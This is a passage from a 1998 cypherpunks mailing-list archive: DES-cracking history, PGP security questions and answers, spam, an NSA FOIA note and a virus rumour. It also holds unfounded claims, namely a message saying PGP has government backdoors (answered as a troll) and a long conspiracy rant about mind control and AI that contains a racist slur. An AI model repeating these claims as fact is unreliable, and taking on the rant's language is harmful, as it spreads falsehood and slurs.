key schedules, which when applied for key search
purposes was a hundred times faster than the
canonical method [Perry doubled the speed by
suggesting the use of Gray codes.]

Later that month, I wrote to Jim Bidzos at RSA,
suggesting a DES challenge, using my prototype's
speed to demonstrate feasibility.  He was
interested, and the Symmetric Key Challenges were
born.

Soon other programmers (notably Svend Mikkelsen in
Dennmark) substantially improved on my speed - by
better optimization, and by clever shortcuts which
allowed earlier rejection of bad keys. A major
innovation was use of Eli Biham's 'bitslice'
algorithm, which tested large blocks of keys in
parallel. The speed of his initial implementation
was doubled by the work of Matthew Kwan in
Australia and Andrew Meggs, et. al. at
distributed.net.

By the end of the latest challenge, the fastest
software search engines had speeds (in clock
cycles per test) well over 100x as fast as my
original 10,000 cycle/key estimate.

Here's one more quote from the archives:

>From: "Peter Trei" <trei@process.com> 
>Date: Fri, 7 Jun 1996 12:55:24 -6 
[...]
>Prediction: By the millenium, we'll have made
>single DES look about as silly as 40 bit RC4 is
>today.

Written well before I started to think about a DES
crack, this, at least, has come true.

Peter Trei
ptrei@securitydynamics.com

Disclaimer: This has nothing to do with my work
at my employer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ric V. Carvalho" <gandalf@waverly.net>
Date: Wed, 22 Jul 1998 17:49:54 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: PGP security?
Message-ID: <l03130302b1dbf4637964@[205.159.233.103]>
MIME-Version: 1.0
Content-Type: text/plain


Hello all,
A friend and I have been going around about the security of PGP.
I believe it to be unbreakable at this point in time.  I also recall
recently reading an article which stated that to break a PGP encrypted
message, using today's technology, unlimited computer core availability,
unlimited $$$, it would take the lifetime of 200 Suns.

What is the security of PGP?  How secure is it?  Are there backdoors that
you know of?
Does the govt. possess any kind of keys capable of opening a PGP encrypted
message?

Thanks in advance for your time and attention.
-Ric

Below is a message I received today concerning what my friend believes
about PGP.
Does anyone know anything to substantiate this claim?
*************************Message Separator********************************

Hi again ric,
PGP stands for "Pretty Good Privacy" (you know that).. but it called
"PRETTY GOOD" because it has several back doors for LEO and government
agencies... I have a masters degree in Electrical Engineering with a
minor in Software design... I think I know a little about computers
also.  While at WVU, we routinely broke PGP messages in Under 2 hours.
The government can open them with their key as fast as you can open them
with yours.  Just a fact... since it aint bullet proof, Camoflage your
messages.
-War






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CF ASSOCIATES <freenow2000@mailexcite.com>
Date: Wed, 22 Jul 1998 20:02:30 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: ...Are You In Need Of A Lifestyle Change...?
Message-ID: <419.435998.95964178freenow2000@mailexcite.com>
MIME-Version: 1.0
Content-Type: text/plain



Now for the first time ever you have the opportunity to join the most
extraordinary and most powerful wealth building program in the world!
Because of your desire to succeed, you have been given the opportunity
to take a close look at this program.

If you're skeptical, that's okay. Just make the call and see for
yourself.  My job is to inform you, your job is to make your own
decision.

If You Didn't Make $200,000.00 Last Year...

You  Owe  It  To  Yourself  And  Your  Family  To  Give  Our  Program
Serious Consideration!

Also, when you start making this kind of money within weeks, after
joining our team, you will actually learn how you can preserve it and
how to strategically invest it!

I invite you to call me for more details at 1-800-781-7046 Ext 4766.
This is a free 2 minute recording, so call right now!

Prosperous regards,

Michael Simmons
This Is Not Multi Level Marketing/Serious Inquiries Only

This is a one-time mailing. When you visited one of our webpages you indicated 
that you would be interested in this information, if not please excuse 
the intrusion and simply delete this message. 
Thank you















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 22 Jul 1998 19:54:03 -0700 (PDT)
To: grassley <HERBERT.RICHARDSON@hq.doe.gov
Subject: NSA willfully and knowingly attempted to sabotage DOE/Sandia cryptographic projects
Message-ID: <35B6A3FB.3CAD@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 7/22/98 8:39 PM

Softwar 
Charles R. Smith follows the money trail of U.S. crypto policy.
http://www.aci.net/kalliste/
7707 Whirlaway Dr. Midlothian, VA 23112
TOLL FREE 1 - 877 - 639 - 1608
softwar@us.net
http://www.us.net/softwar/

Smith

I will send by snail mail a copy of July 6, 1998 FOIA request
951102002 response from Herbert Richardson for

  	all investigative report authored at DOE in to my allegations
  	that NSA willfully and knowingly attempted to sabotage DOE/
	Sandia cryptographic projects.

plus enclosures.

I will phone later for your input on what I should do for further
action.  Other than appeal, of course.

Some at Sandia got into a crypto battle with NSA.
http://jya.com/whpfiles.htm

Let's all hope for settlement before matters get WORSE.

And matters are GETTING WORSE. http://www.jya.com/whp071598.htm

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Wed, 22 Jul 1998 18:08:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: INTELLIGENT VIRUS
Message-ID: <8593e6bd.35b68ce8@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/22/98 8:40:15 PM Eastern Daylight Time,
nobody@remailer.ch writes:

<< On Wed, 22 Jul 1998 ILovToHack@aol.com wrote:
 
 ...
 > THIS IS TO BRING OUT THE TRUTH AND INFORM THE PUBLIC ABOUT A POTENTIAL
THREAT
 ...
 > I was recently informed from sources who choose to remain anonymous about a
viri
 > that uses McAfee's update tool to detect when it is found then it modifies
its
 > code and forms a new strain of the virus this pattern continues although it
 > has only been tested through a clone of McAfee's server to 100 mutations it
 > looks like it could be a big problem I will inform you of any more
information
 > i learn about it 
 
 <<Oh, this is that virus I heard about which introduces typos and makes
 email incoherent! That's old news. AOL users were infected with that years
 ago. >>


This is a new version of the viri it makes your computer WIN98 or 95 shutdown
every 5 minutes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 22 Jul 1998 18:36:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Netscape FOIA Docs
Message-ID: <199807230135.VAA16726@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We offer the FOIA docs EPIC got on Netscape's
presentation for export of cryptographic products
which was cited in the July 20 Network World report
on NSA's long, strong arm:

   http://jya.com/nscp-foia.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@rboc.net>
Date: Wed, 22 Jul 1998 19:13:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: INTELLIGENT VIRUS
In-Reply-To: <8593e6bd.35b68ce8@aol.com>
Message-ID: <3.0.3.32.19980722221137.03a4f034@mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:07 PM 7/22/98 EDT, ILovToHack@aol.com wrote:
>This is a new version of the viri it makes your computer WIN98 or 95 shutdown
>every 5 minutes

Sounds more like an operating system design feature to me.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ric V. Carvalho" <gandalf@waverly.net>
Date: Wed, 22 Jul 1998 21:23:37 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: PGP 5.0 AND 5.5.5/ RSA/DSS SECURITY
Message-ID: <l03130301b1dc261e286e@[205.159.233.111]>
MIME-Version: 1.0
Content-Type: text/plain


I have a question.
I have been using PGP since version 2.  I recently picked up the shareware
version of PGP 5.0/5.5.5
I have both.  I was wondering how secure DSS is?  Also, I was interested in
knowing if the RSA encrytion method used in 5.0 or 5.5.5 is in anyway
different from say version 2.6.3   Is it looser, more penetrable?  How
vulnerable are these versions compared to the older versions?

Thanks in advacne for your time and cosideration.

Life, Liberty, Property,

-Ric

--
Alpha Group Web Site
Http://www.mindspring.com/~warlord1
Encryption, use it or lose it!

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.5 for non-commercial use <http://www.nai.com>

mQGiBDV+3r0RBADyO4SYGfbVJwFpjZTPcECSIcc/SugI0KeJwtd+tTP1bDm51ZPI
fEMffihjXlM9EyuoWikMMs2CFy6+GFZUW3bHWMLoigYIxaRkqWcekDX3mLDwuQgc
kwOpj2jEEh4TRMxJT5ceptgaiaupMpvE8PlnToPfSXScf4n+KHvk4wYJwQCg/6Ei
we3UjLy5bCW3ZRvXQhH1LAMD/0FUgDP7f5gy4Y+qnBs8puW4whsBj68hpSAwZiju
MzrsQLNmr+fQGI+4am5N7Tv/M1qXvui7450oPXZ6gdm+eVTxgFDK7B6sY41SEu9E
1MRmkJv94vSJ29hFOEOcvkzkiY9xCtdgnBbhxCv02kdQ1eMdse8c/iQLt90rWPsH
Kr8vA/4lm8wAEse0+jkYABVcxUKmS3/x0hLJsRefkPs9iP3tvWbaSTkslROb8JeQ
5HShiaa9G1iZX1c+k/9H45M1gUF8ntePNuetye0glXl4PLg7biuELJiW/LLckLFq
Y321Uo23ry3/jjVDcBdLSdPTxj3XPGT3Q9aYKEcdIUL41gN/d7QuUklDIFYuIENB
UlZBTEhPIDA2LzEwLzk4IDxnYW5kYWxmQHdhdmVybHkubmV0PokASwQQEQIACwUC
NX7evQQLAwIBAAoJEFgdjOHM9jayHPsAnR87+QizjB9z6h1UqfqMhxMoZMVGAJ48
xFitx87SAB46VtRFbOwE7Vhs3LkCDQQ1ft7HEAgA9kJXtwh/CBdyorrWqULzBej5
UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1
WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue
jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ
I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG
xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC
Agf/Xx3jbZ0vSfL9V7t3d5DpkX7U6x4k28M4YkwGWLQS+Z9X2G1NLKbFkGltWlGl
7dt2lg9hN/YZRepuaD3Ufg4lle/vReOU7Y0/MldeEsVj8pYg9sSSrEORmUcb+zZA
3IxID7pd9wTS4X554WpODUMw57IyAht3Zp56ESaQOSwEKtymjgsG+UjBTijUIfr7
+Xd3HGQJ1CjFS+wt0wKnB+Qjv65u0moux5bOGPf5wtkRBqWLtqoVRtbf4L2CuaaP
4SNI+SI/ZoNjsGCbFwjH/KELZAFJVjHNXjhX2XVGM3Hod8IG0Cjb7v0itAdA6C2k
Kj6N/4/4FrXjarqy9P4dUHqJYIkARgQYEQIABgUCNX7eyAAKCRBYHYzhzPY2smqz
AJ0V1rFnJ49Dz5KibKFctlzvkH70TQCfbNY2Ns8F9qYuTT+4sNFsXsSjCgM=
=Lykr
-----END PGP PUBLIC KEY BLOCK-----



"To see tomorrow's PC, look at today's Macintosh."
--Byte Magazine

 " There can be no compromise on basic principles.
There can be no compromise on moral issues. There can be no compromise
on matters of knowledge, of truth, of rational conviction." -Ayn Rand


"The government has no source of revenue, except the taxes paid by the
producers.  To free itself -for a while- from the limits set by reality,
the government initiates a credit con game on a scale which the private
manipulator could not dream of.  It borrows money from you today, which is
to be repaid with money it will borrow from you day after tomorrow, and so
on.  This is known as "deficit financing."  It is made possible by the fact
that the government cuts the connection between goods and money.  It issues
paper money, which is used as a claim check on actually existing goods-but
that money is not backed by any goods, it is not backed by gold, it is
backed by nothing.  It is a promissory note issued to you in exchange for
your goods, to be paid by you (in the form of taxes) out of your future
production." -Ayn Rand







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Wed, 22 Jul 1998 22:37:45 -0700 (PDT)
To: Gustavo Henrique <gustavoh@sysadmin.com.br>
Subject: Re: pgp fingerprint
In-Reply-To: <3.0.5.32.19980722235815.00b8e780@208.30.28.18>
Message-ID: <Pine.LNX.4.00.9807222235430.6852-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


I dont quite understand your question, but in PGP 6.0, they will use
pictures aswell.. It is all fakeable.. but verify all info somehow verify
key-id, fingerprint, picture etc.

-- Max Inux (MaxInux@bigfoot.com) UIN: 207447, http://khercs.chipware.net 
Strong Cryptography makes the world a safer place- PGP: 0x5CCFCA59
Or Kinky sex makes the world go round- Christie: Your in my sig too
^^ If Cryptography is outlawed,  only outlaws will have cryptography ^^

 

On Wed, 22 Jul 1998, Gustavo Henrique wrote:

> 
> I've just started studying pgp and crypo and I have a doubt that
> maybe you can answer.
> 
> Correct me if I'm wrong:
> the fingerprint was invented so you can check with the owner of the
> public key if his key is correct. Since the fingerprint is something
> small, you can check it over the phone or some other way.
> 
> The question is: why people put their fingerprints on a mail signature ?
> Some one could have changed his public key and changed his message, so
> that fingerprint will match a wrong public key.
> Isn't it the same nonsense as putting the public key in an email message
> (without
> signing nor encrypting it) ?
> 
> 
> Thanks for the attention,
> 
> 	Gustavo Henrique
> 
> =============================================================
> Gustavo Henrique Maultasch de Oliveira        Sysadmin.com.br
>             
> gustavoh@sysadmin.com.br           http://www.sysadmin.com.br
> =============================================================
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gustavo Henrique <gustavoh@sysadmin.com.br>
Date: Wed, 22 Jul 1998 19:59:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: pgp fingerprint
Message-ID: <3.0.5.32.19980722235815.00b8e780@208.30.28.18>
MIME-Version: 1.0
Content-Type: text/plain


I've just started studying pgp and crypo and I have a doubt that
maybe you can answer.

Correct me if I'm wrong:
the fingerprint was invented so you can check with the owner of the
public key if his key is correct. Since the fingerprint is something
small, you can check it over the phone or some other way.

The question is: why people put their fingerprints on a mail signature ?
Some one could have changed his public key and changed his message, so
that fingerprint will match a wrong public key.
Isn't it the same nonsense as putting the public key in an email message
(without
signing nor encrypting it) ?


Thanks for the attention,

	Gustavo Henrique

=============================================================
Gustavo Henrique Maultasch de Oliveira        Sysadmin.com.br
            
gustavoh@sysadmin.com.br           http://www.sysadmin.com.br
=============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Wed, 22 Jul 1998 17:20:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: INTELLIGENT VIRUS
Message-ID: <19980723004604.645.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Jul 1998 ILovToHack@aol.com wrote:

...
> THIS IS TO BRING OUT THE TRUTH AND INFORM THE PUBLIC ABOUT A POTINTAL THREAT
...
> I was recently informed from sorces who choose to remain annomous about a viri
> that uses macafe's update tool to detect when it is found then it modifys its
> code and forms a new strain of the virus this pattern continues although it
> has only been tested through a clone of macafees server to 100 mutations it
> looks like it could be a big problem I will inform you of any more information
> i learn about it 

Oh, this is that virus I heard about which introduces typos and makes
email incoherent! That's old news. AOL users were infected with that years
ago.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 23 Jul 1998 01:16:06 -0700 (PDT)
To: "Ric V. Carvalho" <cypherpunks@toad.com>
Subject: Re: PGP security?
In-Reply-To: <l03130302b1dbf4637964@[205.159.233.103]>
Message-ID: <3.0.5.32.19980723010758.00b9a920@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The message from your friend is a purely fabricated troll;
don't worry about it.

At 06:41 PM 7/22/98 GMT, Ric V. Carvalho wrote:
>A friend and I have been going around about the security of PGP.
>I believe it to be unbreakable at this point in time.  I also recall
>recently reading an article which stated that to break a PGP encrypted
>message, using today's technology, unlimited computer core availability,
>unlimited $$$, it would take the lifetime of 200 Suns.

Is that 200 Sun Microsystems Computers, or 200 of those big yellow things? :-)

Some previous versions of PGP had some weaknesses.
PGP version 1 had the cool "Bass-O-Matic" algorithm, before
Phil learned cryptography; read his discussion of Snake Oil in the manuals.
I think some of the early versions had weaknesses in their random 
number generators used for session keys, but I may be mixing
that up with Netscape, which definitely used to have that problem.

One of the current concerns is that the popular version 2.6.2 et al
use the MD5 hash, which is starting to show some theoretical weaknesses,
though none of them are known to be exploitable against PGP,
but the newer versions prefer to use SHA-1 as a hash just in case.

There was also a serious problem which allowed an attacker to
create a public/private key pair with the same keyID as a target 
(much shorter key, so quick to create, and who checks key length?),
so the newer versions use a different method for creating keyIDs
that's hard to spoof.  Early versions also used shorter KeyIDs,
so it was possible to get a collision by brute force, so the keyIDs
were made longer.  Impersonating a KeyID makes it possible to fake
signatures, and also possible to trick PGP or the user into trusting the 
wrong key, which is always bad.

The secret key ring file has two current weaknesses,
which matter if somebody can access your file (so don't let that happen!)
One is that if you have wimpy passphrases, a dictionary attack can
crack the record containing your private key, at which point you lose -
so don't use a wimpy passphrase, AND do protect your secret keyring well.
Another, less serious is that the file contains the user name in plaintext - 
so if you're trying to hide your secret identity, someone reading the file 
will see that you not only have keys for Clark Kent, but also for Superman;
in some environments, this can be more dangerous than cracking the
passphrase, because the guys with rubber hoses can get your passphrase
once they know they want it.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Thu, 23 Jul 1998 01:45:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TR3 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9964.46C72D20.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Terminating Resistor III - SPACE ALIENS HIDE M DRUGS!!!
________________________________________________________


IMPORTANT NEWS FLASH!!!
_______________________
I HAVE JUST LEARNED, FROM A RELIABLE SOURCE, THAT SECRET GOVERNMENT
AGENCIES ENGAGE IN ACTIVITIES THAT ARE FORBIDDEN TO / ILLEGAL FOR
THE AVERAGE CITIZEN TO ENGAGE IN!

  OK, so it doesn't come as a major surprise to anyone.
  Nevertheless, our world-view tends to be limited to, and shaped by, the
information that we are 'allowed' to access. Even if we are aware of the
fact that the government is undoubtedly going full-steam ahead in areas
such as cloning research and merger of artificial intelligence with
artificial life forms, we don't give much thought to the implications
and possible consequences of exotic, secret research and experimentation,
because we don't have enough information about what is going on behind
closed government doors to make any judgements.
  The information that we *do* get about out-of-control government actions
and policies invariably comes after-the-fact, or at a time that we are
*told* is after-the-fact. 
("We stopped doing that years ago. Joe doesn't work here, anymore. We
got rid of the bad apples, and now it's just us GoodGuys left...")

  A friend of mine did computer work for an Arizona neurologist who put
electrodes and steel plates in the skulls of monkeys, rabbits, etc., in
order to do brain-mapping (one of the major areas of mind-control 
research), in order to study Parkinson's Disease.
  The neurologist was approached by a research foundation that was very
interested in giving him a grant to work with children, instead of with
animals. This has become an acceptable area of experimentation (a quick
study of those involved easily links them to a variety of intelligence
agencies). Their offer was refused as a result of the format and structure
of the proposal obviously being geared more toward providing information
and results that had more to do with learning methods to control aberrant
behavior than with benefitting the proposed child subjects.
  After his refusal, his current grant was canceled, and he was again
made the offer, which he accepted.

  Dr. Ewen Cameron, the Canadian MKULTRA mind-butcherer, was instrumental
in helping the CIA to see the benefit of taking an 'interdisciplinary'
approach to mind-control.
  Although Dr. Cameron's basic method was to combine a wide variety of 
medical, biological, psychiatric, anthropological, et al, methods using
his own limited knowledge, in your basic VoodooLeeches methodology, the
CIA and military intelligence agencies began consolidating the various
arenas of mind/human-conditioning research and experimentation by helping
to sychronize the research of a wide body of educational and research
professionals in divergent fields of expertise.
  As a result of directing the focus and evolution of the majority of
scientific and psychological research in North America through control
of the funding mechanisms and access to research publishing, the American
intelligence community has managed to merge the research community into
an integrated tool for delivering the information and results desired
by the Controllers for their own grand designs.

  John Lily, a respected cutting-edge researcher told the intelligence
community to "Fuck off!" when they approached him with an offer to fund
his research on the condition that it become secret/classified.
  Lily suddenly found most doors in the scientific community being slammed
in his face, not able to even getting a job sweeping-up after conferences
that he previously had been begged to attend. (In essence, he quickly
found that he couldn't even get elected ScientificDogCatcher.)
  Not to worry, there were researchers standing in line to take Lily's
pioneering mind-mapping research to new heights, using experimentation
techniques on human subjects that Lily had too much compassion and 
integrity to use on dolphins.

  The "Dont ask...don't tell..." military policy on homosexuality in the
armed services has long been an unspoken understanding in the research
community, where the players long ago learned that making an issue of
the ethics of the researchers down the hall throwing niggers off the
roof, to see it they really do have thick skulls, could have negative
reprecussions on their own position and funding.
  Many researchers find themselves doing what they consider to be needed
and pertinent research in their projects on their own time, after they
have satisfied the wants and needs of those funding their project.
  Of course, if you ask most researchers about the veracity of what I
have just claimed, you will meet with sincere denials, and perhaps even
genuine laughter. However, a relative of mine who is engaged in providing
seminars on effective philanthropic fund-raising makes no bones about the
fact that the success of his seminars revolves around teaching people to
sell their souls while remaining blissfully ignorant of the fact that
they are doing so.
("If murdering a thousand children in my research saves the life of a
 single child...")

  While I am not in any way suggesting that the majority of researchers
are NaziMonsters, having allowed themselves to be maneuvered into a
position where their research is driven by the goals of those funding it,
their research in 'turning on the gas' is irrevocably linked to research
by loosely connected entities who are being funded to research 'putting
them in the ovens.'
  Intelligence agencies' interdisciplinary approach to developing the
ability to monitor and control the minds, beliefs, attitudes, actions
and behavior of the citizenry (in the interests of National Security,
of course), has resulted in what has been openly known by many as the
New Manhattan Project. Just as the Nuclear/Atomic Manhattan Project
was an all-out, top priority effort engaging the premiere players in
a variety of scientific fields, the New Manhattan Project involves a
consolidation of research and activity spanning such diverse arenas
as mind-control, emotional-manipulation, behavioral conditioning,
citizen surveillance-monitoring-classification, and even encryption.

  The research and experiments in Artificial Intelligence and Human
Intelligence are intricately linked.
  Neural Network models and implementations are based on understanding
and imitating human "operant conditioning, the form of learning in which
animals and humans learn the effects of their actions," as Professor
Stephen Grossberg states.
  The Artificial Intelligence approach of Neural Networks is based on
the processing of symbolic information, as opposed to numerical data.
The Controllers have mastered the art of 1984'ish manipulation of the
public mind through media control and spin doctoring, now able to 
gather the citizens into an angry torch-carrying mob, chasing the 
U.S.ConstitutionMonster back to the castle to defend themselves against
the NewImprovedFourHorsemenOfTheApocalypse. (Any Congressman who is
caught dorking a teenage girl and cheating on his taxes has a fighting
chance of surviving if he can convince the electorate he is 'tough on
crime,' or whatever the current TenSecondSoundByteFadOfTheDay is.)
  The Controllers efforts to control access to information are centered
around their need to control the EmotionalSymbolism by which they have
learned to lead the public around by our noses.

  The grand Artificial Intelligence push to "develop principled theories
of brain and behavior and incorporating them into machines," as Brian
Fitzgerald writes in 'Bravo New World,' is really part-and-parcel of the
Controllers' designs to guide the future development of the InterNet into
a WorldWideStickyWeb wherein the Medium is capable of manipulating the 
user into the position of controlled stooge, rather than a participant,
by being able to monitor, log and analyze the user's basic operant
conditioning, via his or her responses, thus being able to provide the
user with only those options which will lead them in the direction that
is desired by the Controllers.
(An example is the feature of allowing the user to 'customize' the
 interfaces they are interacting through, according to their personal
 interests, with the AutoBot then serving up generous helpings of pointers
 and information beneficial to the provider, instead of a genuine cross-
 section of what is actually available on the InterNet.)
{Interest #1 - Anarchy: Today we are providing you with Newt Ginrich's
 essay, entitled "What Anarchy Means To Me."
 Interest #2 - SPACE ALIENS HIDE M DRUGS!!! Manuscripts: Click on the
 provided link to read Ms. Manners Politically Correct Revision of the
 manuscripts, which are rated Family Entertainment by CyberNanny.}

  The federal government proclaimed the 1990's the Decade of the Brain.
What they neglected to mention is that Military Intelligence has been
put in charge of monitoring, analyzing and shaping the Brain...
  CNS (Cognitive Neural Systems) research and development has become a
wholly owned subsiduary of the Air Force super laboratories, the Office
of Naval Research, DARPA (Defense Advanced Research Projects Agency),
the National Science Foundation, and the rest of the Usual Suspects.

  ou remember DARPA, don't you--those wonderful folks who gave us the
InterNet which routes all communications through military channels?
  ou remember the Office of Naval Research, don't you--those wonderful
folks who developed products and techniques for monitoring all of the
communications on the face of the earth?

  Fitzgerald notes, in 'Bostonia,' that "Graduates of CNS work in a 
plethora of fields, including psychology, neuroscience, telecommun-
ications, software engineering, economics, finance...medicine...and,
of course, robotics.
  Strip away the thin veneer of reliance on the research being conducted
by RespectableInstitutions and what you have is MKULTRA cross-breeding
with Artificial Intelligence to produce a DemonChild whose NeuralNetworks
are a fusion of GrayMatter and a DigitalThisIsWhereouAreGoingToGoToday
AutoBot.

  Julia Schickedanz, an MIT professor, remarks on the fact that the
professors involved in CNS research and development "specialize in
seemingly unrelated areas of research."
  Right...and the New World Order will result in the globalization of
"seemingly unrelated areas" of the world...

  Grossberg, speaking of the 'interdisciplinary' approach to the study
and implementation of Artificial Intelligence, says, "such an approach
is absolutely necessary to theoretically investigate fundamental issues
of mind and brain processes."
  I am certain that it is just a 'coincidence' <nod-nod> <wink-wink> that
two champions of the 'interdisciplinary' approach to research in the
understanding of how the mind works and how it can be manipulated, Dr.
Ewen Cameron, Canadian mind-butcherer, and Professor Grossberg CyBorg
Creator, are each a Rockerfeller GoldenChild.

  Grossberg apparently spent decades and millions of dollars discovering
what he could have learned by forking over a sawbuck for a book by the
GrandaddyOfInterActiveMediaUnderstanding, Marshal McCluhan, 'The Medium
Is The Message,' as he informs us, belatedly, "What we perceive depends 
on how the nervous system processes messages."
  And those wonderful folks who provided us with an interactive medium
which they are capable of monitoring and controlling, are now involved
in a priority funding of research which will enable the medium to be
able to process/provide messages which are intricately linked with the
structure and functioning of our own nervous system.
  More importantly, the ability of the computer to monitor our habits and
the most infinitesimal details of our personal lives, when combined with
a neural network capable of learning and adapting to our thoughts, our
desires and our habits, essentially has the capacity to transform itself
into a Mythological Siren of the Deep, luring us to our destruction,
regardless of whether or not we know it to be an Illusion.
(If you think I am overstating my case, here, remind yourself how easy
 it is for Charlie CorporateMonger to get JoeSixPack to provide every
 detail of his life in order to get a SuperMarketValueCard that gets
 him a nickle off on a can of beans. If they had a record of your visits
 to and file accesses on the BigBreastedBlonde Web Site, they would have
 a Swedish Masseuse bring you the card to fill out, and end up with your]
 wallet, your car and your house, as well, and you'd be eating your beans
 out behind the dumpster.)

  In essence, Artificial Intelligence researchers are attempting to find
ways to incorporate the ability to understand and incorporate human 
behavior and response mechanisms into programmed machines/environments,
thus rendering them capable of fulfilling functions which humans normally
require decades of experience and application to acquire competence in.

  During my last entry into the U.S. through the Vancouver Customs port,
my sister was horrified to learn that the devices in each lane were 
visually and auditorily monitoring those who passed through. License
plates are auto-scanned and run through the computer to flag people of
interest to Border Authorities (and I suspect that visual recognition
technology of humans is also being used/tested).
  The vehicle in front of us contained your typical middle-class American
family, and was passed through with only perfunctory attention being
given to them, yet the Customs Officer thumped on the top and side of
their car before waving them to proceed, as if checking to make sure that
they didn't have a few hundred kilos of heroin stashed away.
  My sister was puzzled as to why he did that, whereupon I explained that
he was not interested in *their* reaction, but in *mine*, since I was next
in line, the computer had flagged me, and someone inside was undoubtedly
listening to see if I told her, "Are you sure you hid the dope?"

  Some of the Artificial Intelligence AutoBots of the future will no
doubt be MultiMedia HumanResponse LieDetectors.
  Rather than measuring your pulse, breathing rate and electrical
tension, they will measure variations in your Personally Categorized
Basic Neural Network Profile.
  Just as gun ownership can be denied today on the basis of a history
of mental problems or criminal activity, certain activities, rights,
or access to information, in the future, will be based on your meeting
guidelines/profiles as judged by your interactions with AutoBots that
are designed to analyze and categorize your mind and behavior.

  Grossberg maintains, "All conscious states are resonant states. 
And resonance can join cognition to emotion in a unified conscious 
experience." 
  The implication of this is that the Artificial Intelligence that is
being developed to work in parallel with the human brain and the elements
of human behavior will be capable of becoming a 'partner' in our thoughts,
emotions, and consciousness, and thus be an integral part of that which
influences the direction and processes of our mind, psyche and behavior.

  Take a moment to think about the full import of the technology which
will shape our future being shaped and directed almost wholly by Military
Intelligence agencies and their associates.
  Advertising psychology and MKULTRA mind-control research are barely
poor-cousins to the Cognitive Neural Systems technology that is being
prepared to not only monitor, analyze and categorize even the most
minute areas of our mind, emotions, psyche and behavioral patterns,
but also to have the capacity to adapt *their* behavior to our own
personal psychological structure and, as in the case of Thing1 and
Thing2, "predict" our "impending impacts" with the desires of the
Controllers, and direct us toward "avoidance behaviors" which will
"suppress movements that will cause collisions" with the goals and
designs of the Controllers.

  It can't be long before the Trilateral Commission is replaced by
the Trilateral CPU...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marketinfo@imarket.cc
Date: Thu, 23 Jul 1998 05:06:11 -0700 (PDT)
To: friend@smtp.leading.net
Subject: Discover Your Family History - Rated "Cool Site of the Week"
Message-ID: <199807221748.NAA26766@smtp.leading.net>
MIME-Version: 1.0
Content-Type: text/plain



Discover Your Family History - Rated "Cool Site of the Week"

                Come visit our website at,
<a href="http://www.kgroup12.com/names/heritage32.htm">Free
Search</a>
(if the above link is busy please use...)
<a href="http://209.196.136.246/research2.htm">Free
Search</a>

        Do you know WHO your ancestors are and WHAT they did?
        Do you know WHEN your surname first appeared?
        Are you curious about WHERE your family roots originate?

Now you can fill in the missing pieces of this puzzle.
Join the satisfied multitudes who have discovered their complete Family Surname History.

All Nationalities. It's easy. Just key your last name into our online
index, and in seconds we will tell you it's origin and much MORE.  See if we've researched your complete family name history during our 25 years of professional research.

Read a sample history, plus - FREE Coat of Arms keychain with your
family's most ancient coat of arms & crest. All in full color. Your
family name history parchment is 11 x 17", approximately 1700 words. It is beautifully ILLUMINATED by your most ancient Coat of Arms in full authentic Heraldic Colors.  Over 500 URLs on family and heraldic
history.

Please come visit our website at,
<a href="http://www.kgroup12.com/names/heritage32.htm"">Free
Search</a>
(if the above link is busy please use...)
<a href="http://209.196.136.246/research2.htm">Free
Search</a>



Hall of Names International Inc.
1-888-My-Roots  (1-888-697-6687)

[remhon@yahoo.com]
Come Visit.	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
